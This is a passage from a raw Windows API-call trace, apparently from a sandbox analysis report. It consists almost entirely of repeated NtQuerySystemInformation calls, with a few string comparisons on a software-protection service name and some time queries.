SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.062] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a8, Length=0x50, ResultLength=0x0) [0207.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0207.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0207.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0207.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x28, ResultLength=0x0) [0207.071] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0207.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0207.072] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x28, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x28, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x28, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x20, ResultLength=0x0) [0207.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.082] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd400 | out: lpSystemTimeAsFileTime=0xc751dfd400*(dwLowDateTime=0xdcb58007, dwHighDateTime=0x1d5fb6e)) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd308, Length=0x50, ResultLength=0x0) [0207.083] GetTickCount () returned 0x117475c [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x28, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0207.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0207.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x28, ResultLength=0x0) [0207.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0207.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 